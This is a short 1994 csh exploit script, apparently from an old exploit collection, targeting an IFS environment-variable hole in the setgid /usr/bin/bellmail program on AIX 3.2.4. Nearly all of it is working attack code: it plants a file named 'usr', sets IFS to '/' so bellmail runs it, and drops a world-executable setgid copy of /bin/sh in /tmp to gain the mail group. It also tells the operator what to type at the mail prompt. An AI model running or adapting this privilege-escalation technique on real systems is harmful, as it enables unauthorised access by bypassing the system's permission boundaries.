|
#!/bin/csh # Written by A-Flat - June 30, 1994 # Exploit IFS hole in /usr/bin/bellmail to give us GID=mail. # Tested on AIX 3.2.4 # -r-sr-sr-x 1 root mail 30340 Jun 18 1993 /usr/bin/bellmail # sum: 47709 30 /usr/bin/bellmail cat > usr << EOF IFS=" " export IFS /bin/cp /bin/sh /tmp/.1 /bin/chmod 2777 /tmp/.1 EOF chmod 755 usr setenv IFS / echo " " echo "At the ? prompt, send mail to a user (m username)" echo " " bellmail unsetenv IFS rm -f usr echo " " echo "Executing SGID mail shell." /tmp/.1 rm -f /tmp/.1